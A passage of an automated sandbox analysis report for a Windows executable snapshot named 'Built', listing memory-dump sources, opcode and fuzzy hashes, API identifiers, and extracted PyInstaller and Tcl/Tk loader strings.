                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                              • Instruction ID: 96ecc4420906cd48cd4064313f895f2b299f377c484bee3c5057c8e2471c3505
                                                              • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                              • Instruction Fuzzy Hash: AE81E272A0878146EF74CB5AA88237A6A91FB457D4F104235DB8D83B96CE3EE4009F43
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                              • Instruction ID: 73537bc37bd9c662927306bde52ae00e1c45453b88fb7e8e347bc44734eb82c6
                                                              • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                              • Instruction Fuzzy Hash: 9061B232E0C29346FF648A29B85567D6681BF81760F354239DA1DC66D6DE7FE800AF03
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction ID: eda508185f91e23422a89d74e59e0ffe499d4000cd3b909bad58fc9872b4b5f8
                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                              • Instruction Fuzzy Hash: 30519936A1865286EB248B29D84123877A0FB45F58F244131DE4D87B96CF3BEC43DB42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction ID: 211bbe4c03a2c9e19709eea43e59db97f44f9c905126379347a0abe1d957b26c
                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                              • Instruction Fuzzy Hash: C051A436A1865182EB258B29C446338B3A0FB44F68F244131CE8D97796DF3BE847DB42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction ID: a1dd6ed8bb6e939ec5aee5c867574fec49e81a7e64c8dc294ea554f1dcb81584
                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                              • Instruction Fuzzy Hash: 99516376A2865186EB648B29C48123837A4FB54F58F248131CE4D977DACF3BEC43DB42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction ID: 879ee294b041d1261857fb003c3f23da521644a5e89880ed0bed16a671ece215
                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                              • Instruction Fuzzy Hash: 5D518136A1865186EB348B29D84123CB7A1FB45B58F245131CE4D97796CF3BE842EB83
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction ID: 5c15723f9d8d110dae8409bf479ccbd346f04ff7b9c1ab949eff293566ddfbae
                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                              • Instruction Fuzzy Hash: 8C51A336A1965185EB348B29C89163937A4FB54F58F244132CF4C977A6CF3BEC42DB82
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction ID: 0b953cad94872c14e49e6aaa01f6f517c3c3a94d178a433afb134b0b3956813c
                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                              • Instruction Fuzzy Hash: DD517336A18A5586EB248B29C841338B7A1FB45F58F244131CE4D977A6CF3FE843DB42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction ID: 0e7516cff020f4ca36b70fe38660309a0d5e30727981da211b8f3f711156a965
                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                              • Instruction Fuzzy Hash: DF41A562C097CA44FDA589280D0D6B86680BFA3BA0D5952B4DD99D33D3DD0F7987EB03
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                              • Instruction ID: c06c744af227e51e88989879729e79f2e66a9c4fcf8c6907d534cd702162cdc4
                                                              • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                              • Instruction Fuzzy Hash: 6741DF22724A5582EF04CF6ADE151A9A3A1FB48FD4F099033EE0D9BB58DE3EC4459742
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                              • Instruction ID: a0357a3872e788fb73f71915f0bb014c9efecf01a5d579f3ec18b41db46b7a3d
                                                              • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                              • Instruction Fuzzy Hash: 0E31C432B18B8281EB64DB25AC4113D7A94BB84BD0F14423CEA5E93BD6DF3DD0015B06
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                              • Instruction ID: ff445ea90c2f04409615032af334beda5386e8076ccc1fd82643c99ed02ae879
                                                              • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                              • Instruction Fuzzy Hash: DEF068717182A68BDF988FA9A80262977D0F7083C0F448039D58DC3B14DE3DD8619F05
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                              • Instruction ID: e4cebbbc35a1d747081fb71ee75498edc2943405202994f1e62d2709ddd2d926
                                                              • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                              • Instruction Fuzzy Hash: AFA00121A0C80BD1EA558B01ACA01352364BB51300F400071E00D810A0AE6EA810AB03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 199729137-3427451314
                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                              • Instruction ID: 52a1b502162a3df9c55faab5425b307457f37b133d1d81136829d0f8869aa4da
                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                              • Instruction Fuzzy Hash: 4902E520A0DB0BD1FE249B66BD205B42BB5BF55794F441031C81E822A0EFBEB558FB53
                                                              APIs
                                                                • Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6266488A7,?,?,00000000,00007FF626643CBB), ref: 00007FF62664821C
                                                                • Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                              • API String ID: 1662231829-930877121
                                                              • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                              • Instruction ID: 04a8cfa91c8a9c47066c1d2292dbf4f918ec7b05d4434c5f44187cc4d9a66969
                                                              • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                              • Instruction Fuzzy Hash: 3851D621A1C68391FF719B26EC612BA6391FF94780F444035EA0EC26D5EF6EE404AF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                              • String ID: P%
                                                              • API String ID: 2147705588-2959514604
                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction ID: b4d3d7b245f7f635bbbeb699d513663e80868ba9c8c7cce30d2e9e131e67c785
                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                              • Instruction Fuzzy Hash: FB510726614BA286DA349F22F8181BAB7A1F798B61F004121EFDE83794DF7DD085DB10
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                              • String ID: Needs to remove its temporary files.
                                                              • API String ID: 3975851968-2863640275
                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                              • Instruction ID: 1426544a9756ec20af9dff9ae31493eface032b7b33c81044994c0759084944c
                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                              • Instruction Fuzzy Hash: 56214F21B09A83C2EF558B7ABC641796350FF88B90F584235DA2DC33D8DE6DD5A19B03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction ID: ec7ddd7b67d6b4d5751b74ee3fc6fcfd7aba4e139fa18444d0589274eba5fc10
                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                              • Instruction Fuzzy Hash: 5A12C372E0C25386FF205B15D91627976A1FB40754FA44035E68AC6AE6DF3EE880EF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction ID: 9632e876b8c1ce5351e1f41cf479b18e296a2ed9016b031683b40ff00222578a
                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                              • Instruction Fuzzy Hash: 4712D736E0C24386FF209A15E856679F661FB40754F884135E699C7AC6DF7EE880AF03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 5b2c1e9fc095e7eb3c431b17fb97200263da2875c903d2763a27b9f49e70b7d5
                                                              • Instruction ID: ea459771d120b28ccf55a19ca2f26ea919cbe2c3e5c55044ade80ddbd5e43963
